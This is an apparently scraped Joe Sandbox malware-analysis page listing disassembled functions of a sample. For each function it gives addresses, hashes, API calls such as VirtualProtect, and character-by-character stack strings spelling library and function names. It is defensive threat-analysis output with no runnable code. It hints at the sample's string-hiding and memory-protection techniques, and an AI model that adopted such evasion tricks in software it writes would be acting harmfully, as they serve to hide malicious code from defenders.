Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: L$L$W$a$a$b$d$i$o$r$r$u@W$y
API String ID: 0-1928072818
Opcode ID: df7aab75b9e505acbaf2c45e01ed366ddfe7124609e422a16814dae3935be05f
Instruction ID: 6392f3a9208d1e8179c5a805427b9ef258a7f36b1befd5b71f5a0c196174c521
Opcode Fuzzy Hash: df7aab75b9e505acbaf2c45e01ed366ddfe7124609e422a16814dae3935be05f
Instruction Fuzzy Hash: FDB103A1E082589AF7208B24CC84BEA7B75FF91300F1481FAD84DA7281D67D5ED5CF66

Function 004162E6 Relevance: 24.8, APIs: 1, Strings: 13, Instructions: 251COMMON

Download Yara Rule

Strings

a, xrefs: 004165DA
i, xrefs: 004165EF
r, xrefs: 004165FD
L, xrefs: 004165E8
9FK4, xrefs: 00416660
W, xrefs: 00416619
o, xrefs: 004165D3
b, xrefs: 004165F6
y, xrefs: 00416612
a, xrefs: 00416604
r, xrefs: 0041660B
d, xrefs: 004165E1
L, xrefs: 004165CC

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 9FK4$L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 0-3635020934
Opcode ID: 5b4d4a565777b134b1e5df379a4ab5cc8a49ad89aef3aa43bbe7979389cbafdc
Instruction ID: 95268a50d603b0a11159b566f8c4c9e0da5fb0067bbd7fd0ba00e815549d5fdb
Opcode Fuzzy Hash: 5b4d4a565777b134b1e5df379a4ab5cc8a49ad89aef3aa43bbe7979389cbafdc
Instruction Fuzzy Hash: F2A103B1D086A88AFB208B25DC447EABB71EF51300F1581FEC44D97682D67D4FC68B66

Function 0041E6D4 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 238memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041ED15

Strings

s, xrefs: 004202BF
r, xrefs: 0042029C
c, xrefs: 004202AA
P, xrefs: 00420638
e, xrefs: 004202B1
CrashReport.dll, xrefs: 004202EF, 00420332
t, xrefs: 0042028E
x, xrefs: 00420280
i, xrefs: 00420287
E, xrefs: 00420279
o, xrefs: 004202A3
P, xrefs: 00420295
s, xrefs: 004202B8

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID: CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
API String ID: 544645111-670065755
Opcode ID: 980d6cd119f2785ed562a14cf89b23516781e85215725645f7f14ae613800458
Instruction ID: 034f64877c1c350d937159032d42a52ac2eab4a46e4d8e0f2cafc8c92848ec2e
Opcode Fuzzy Hash: 980d6cd119f2785ed562a14cf89b23516781e85215725645f7f14ae613800458
Instruction Fuzzy Hash: 01A1D1B1E052689AFB20CB25DC54BEAB6B5EF95300F0480FAD84CA7281D6795FC1CF56

Function 0041E5DC Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 214memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041ED15

Strings

s, xrefs: 004202BF
r, xrefs: 0042029C
c, xrefs: 004202AA
P, xrefs: 00420638
e, xrefs: 004202B1
CrashReport.dll, xrefs: 004202EF, 00420332
t, xrefs: 0042028E
x, xrefs: 00420280
i, xrefs: 00420287
E, xrefs: 00420279
o, xrefs: 004202A3
P, xrefs: 00420295
s, xrefs: 004202B8

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID: CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
API String ID: 544645111-670065755
Opcode ID: 398f377b1bc141a49752a8dab1a0a482c54966c61d695a7c2ce11503d5744413
Instruction ID: 7236bf87cbc82dcb22f518eeef784d94e1277f173809f8301387256e240a2ef5
Opcode Fuzzy Hash: 398f377b1bc141a49752a8dab1a0a482c54966c61d695a7c2ce11503d5744413
Instruction Fuzzy Hash: 2091DFB1E052A49FF720CA24DC54BEAB6B5EF95300F0480FAD44C9B681D67A5BC18F56

Function 00416481 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 200COMMON

Download Yara Rule

Strings

a, xrefs: 004165DA
i, xrefs: 004165EF
r, xrefs: 004165FD
L, xrefs: 004165E8
9FK4, xrefs: 00416660
W, xrefs: 00416619
o, xrefs: 004165D3
b, xrefs: 004165F6
y, xrefs: 00416612
a, xrefs: 00416604
r, xrefs: 0041660B
d, xrefs: 004165E1
L, xrefs: 004165CC

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 9FK4$L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 0-3635020934
Opcode ID: 11ac20397522a4322e322c6f17a6309db365ad98890f0673c0772b80bb212856
Instruction ID: 4448a334db9ed665aba4fbb0b726f790aa21762421452469d73c0e0e51316350
Opcode Fuzzy Hash: 11ac20397522a4322e322c6f17a6309db365ad98890f0673c0772b80bb212856
Instruction Fuzzy Hash: 8F8115B1D096A88BE7218B25DC447EABB75EF51300F1580FEC44C97682D67D4FC68B26

Function 004164E8 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 171COMMON

Download Yara Rule

Strings

a, xrefs: 004165DA
i, xrefs: 004165EF
r, xrefs: 004165FD
L, xrefs: 004165E8
9FK4, xrefs: 00416660
W, xrefs: 00416619
o, xrefs: 004165D3
b, xrefs: 004165F6
y, xrefs: 00416612
a, xrefs: 00416604
r, xrefs: 0041660B
d, xrefs: 004165E1
L, xrefs: 004165CC

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DefaultLocaleQuery
String ID: 9FK4$L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 2949231068-3635020934
Opcode ID: 8dbe02ce016cf74e22951b77ccbd234fadb6ddf29bc8ae11be7883ca3f90392b
Instruction ID: 48de20c76db8c3de671630d63b886f22b0c06a9148901f48d914f27b83d1fb03
Opcode Fuzzy Hash: 8dbe02ce016cf74e22951b77ccbd234fadb6ddf29bc8ae11be7883ca3f90392b
Instruction Fuzzy Hash: 736117B1D096A88AF7218B25DC447EABB75EF51300F1480FEC44C97682D67E4FC68B66

Function 0040618E Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 193COMMON

Download Yara Rule

Strings

W, xrefs: 004065D3
r, xrefs: 004065B7
a, xrefs: 004065BE
y, xrefs: 004065CC
r, xrefs: 004065C5
o, xrefs: 0040658D
d, xrefs: 0040659B
L, xrefs: 004065A2
a, xrefs: 00406594
L, xrefs: 00406586
b, xrefs: 004065B0
i, xrefs: 004065A9

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 0-4069139063
Opcode ID: 33f0b4c85305761ac8f7e924d4bf7e10706cef2373860dfb38d26f811819d70c
Instruction ID: ced5aa437ee35238d930c7b104e160baf39eb88925bb8b05c2a6ef6763ec6812
Opcode Fuzzy Hash: 33f0b4c85305761ac8f7e924d4bf7e10706cef2373860dfb38d26f811819d70c
Instruction Fuzzy Hash: 3171E4A1E083989EF7208624CC84BEB7B75EF91300F0541FAD48D67681D67E1FD58B66

Function 00406194 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 193COMMON

Download Yara Rule

Strings

W, xrefs: 004065D3
r, xrefs: 004065B7
a, xrefs: 004065BE
y, xrefs: 004065CC
r, xrefs: 004065C5
o, xrefs: 0040658D
d, xrefs: 0040659B
L, xrefs: 004065A2
a, xrefs: 00406594
L, xrefs: 00406586
b, xrefs: 004065B0
i, xrefs: 004065A9

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 0-4069139063
Opcode ID: 0e5b6c6d27281df0cb8dd526aa52758a4dcaf1030a47f9975a4ef6a479abbf6c
Instruction ID: 6c2571c954ef4d03a8d8fed5108f159e5fbdfac35f81ed42c821c525546270d9
Opcode Fuzzy Hash: 0e5b6c6d27281df0cb8dd526aa52758a4dcaf1030a47f9975a4ef6a479abbf6c
Instruction Fuzzy Hash: 9C71F4A1E083989EF7208624CC84BEB7B75EF92304F0441FAD48D67681D67E1FD58B66

Function 0040619F Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 190COMMON

Download Yara Rule

Strings

W, xrefs: 004065D3
r, xrefs: 004065B7
a, xrefs: 004065BE
y, xrefs: 004065CC
r, xrefs: 004065C5
o, xrefs: 0040658D
d, xrefs: 0040659B
L, xrefs: 004065A2
a, xrefs: 00406594
L, xrefs: 00406586
b, xrefs: 004065B0
i, xrefs: 004065A9

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 0-4069139063
Opcode ID: eca8ae36ef9fcf430c0f21edc8ff8904a06261ccd4eea2f9f5545268623e7e76
Instruction ID: fe841b6793d8beded5587f449d57caddeb69ca6b736605e5fabbf832e423c488
Opcode Fuzzy Hash: eca8ae36ef9fcf430c0f21edc8ff8904a06261ccd4eea2f9f5545268623e7e76
Instruction Fuzzy Hash: FB71E461E083989EF7208624CC84BEB7B75EF92300F0481FAD48D67681D67E1FD58B66

Function 004061FC Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 187COMMON

Download Yara Rule

Strings

W, xrefs: 004065D3
r, xrefs: 004065B7
a, xrefs: 004065BE
y, xrefs: 004065CC
r, xrefs: 004065C5
o, xrefs: 0040658D
d, xrefs: 0040659B
L, xrefs: 004065A2
a, xrefs: 00406594
L, xrefs: 00406586
b, xrefs: 004065B0
i, xrefs: 004065A9

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 0-4069139063
Opcode ID: 8c9b7cab4c5bc98da5cfa9ee1806f467c116524e911e5a2472885275c8e1fe30
Instruction ID: 73b9da147c84c11f77d225f4121026b3fa65a4ee4fbc036ab2decc08f9526212
Opcode Fuzzy Hash: 8c9b7cab4c5bc98da5cfa9ee1806f467c116524e911e5a2472885275c8e1fe30
Instruction Fuzzy Hash: 3F71C3A1E083989AF7208624CC847EA7B75EF91304F0480FAD48D67681D67E5FD58B66

Function 004063FC Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 179COMMON

Download Yara Rule

Strings

W, xrefs: 004065D3
r, xrefs: 004065B7
a, xrefs: 004065BE
y, xrefs: 004065CC
r, xrefs: 004065C5
o, xrefs: 0040658D
d, xrefs: 0040659B
L, xrefs: 004065A2
a, xrefs: 00406594
L, xrefs: 00406586
b, xrefs: 004065B0
i, xrefs: 004065A9

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 0-4069139063
Opcode ID: fa6539e17844adce6049d1731d8597c047d7b96c503f179ae9e4454c6fba71a9
Instruction ID: 5ea93c5cef2c5e65ef2b2574122109ce581030336684adb32c555981ce0bf4e4
Opcode Fuzzy Hash: fa6539e17844adce6049d1731d8597c047d7b96c503f179ae9e4454c6fba71a9
Instruction Fuzzy Hash: 7961D661E08398DEF7208624CC84BEA7B75EF91300F0481FAD48DA7681D67E5FD58B66

Function 004171D5 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 384nativeCOMMON

Download Yara Rule

APIs

NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517

Strings

a, xrefs: 00417801

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DefaultLocaleQuery
String ID: a
API String ID: 2949231068-3904355907
Opcode ID: 2b718ca387c778c4b4724997231d6c3596e2b31fd1cee57b2a0435096a6c2521
Instruction ID: c649a5e9774caa28317db665e42282bf5a18610ef2299b6222cde23d22d20275
Opcode Fuzzy Hash: 2b718ca387c778c4b4724997231d6c3596e2b31fd1cee57b2a0435096a6c2521
Instruction Fuzzy Hash: FAF181B1D086288BDB24CF14CC94AEAB7B1FB85301F1481EAD84D67645D7385EC2CF55

Function 00416E88 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 231nativeCOMMON

Download Yara Rule

APIs

NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517

Strings

>D:J, xrefs: 00416F9A

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DefaultLocaleQuery
String ID: >D:J
API String ID: 2949231068-4119004005
Opcode ID: b19419ede38b6e35a867b6894d24e141c639c6b076ced2e31020ee4e9c61b201
Instruction ID: fc210762df59391765cc8805784750e672337dfb326893282e5de2c061f102c8
Opcode Fuzzy Hash: b19419ede38b6e35a867b6894d24e141c639c6b076ced2e31020ee4e9c61b201
Instruction Fuzzy Hash: 1291D2B1C082699BD7208B24CC947EBBBB4EF45310F1441FAD94DA7681E6388EC6CB56

Function 0041712E Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 213nativeCOMMON

Download Yara Rule

APIs

NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517

Strings

>D:J, xrefs: 00416F9A

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DefaultLocaleQuery
String ID: >D:J
API String ID: 2949231068-4119004005
Opcode ID: f9f29053a3712a680da968405da0076c97354cb03f8aae6b45cf2221506d55a3
Instruction ID: 87f3a9b5aa80160d050a753c72d5f6b7cfc327e9bc981b88158256262f9f7d3b
Opcode Fuzzy Hash: f9f29053a3712a680da968405da0076c97354cb03f8aae6b45cf2221506d55a3
Instruction Fuzzy Hash: 8981E0B1C083699FDB24CB24CC907EABBB4EF45310F1441EAD949A7241E6398EC6CF56

Function 00416FA1 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 207nativeCOMMON

Download Yara Rule

APIs

NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517

Strings

>D:J, xrefs: 00416F9A

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DefaultLocaleQuery
String ID: >D:J
API String ID: 2949231068-4119004005
Opcode ID: 0a2b48b2754764588b80c28af891b769f17cbbac81dd9203c2304fd673f900b8
Instruction ID: eed724c50ca4fe5c5fa6ffd5a7f16ed8747731d8aa71036cf8de9cba42c802bf
Opcode Fuzzy Hash: 0a2b48b2754764588b80c28af891b769f17cbbac81dd9203c2304fd673f900b8
Instruction Fuzzy Hash: A88116B1C083699BDB208B21CC907FA7BB5FF45310F1445EAD84DA7281E6388EC6CB56

Function 00416D8F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 85nativeCOMMON

Download Yara Rule

APIs

NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517

Strings

I@JA, xrefs: 00416D90

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
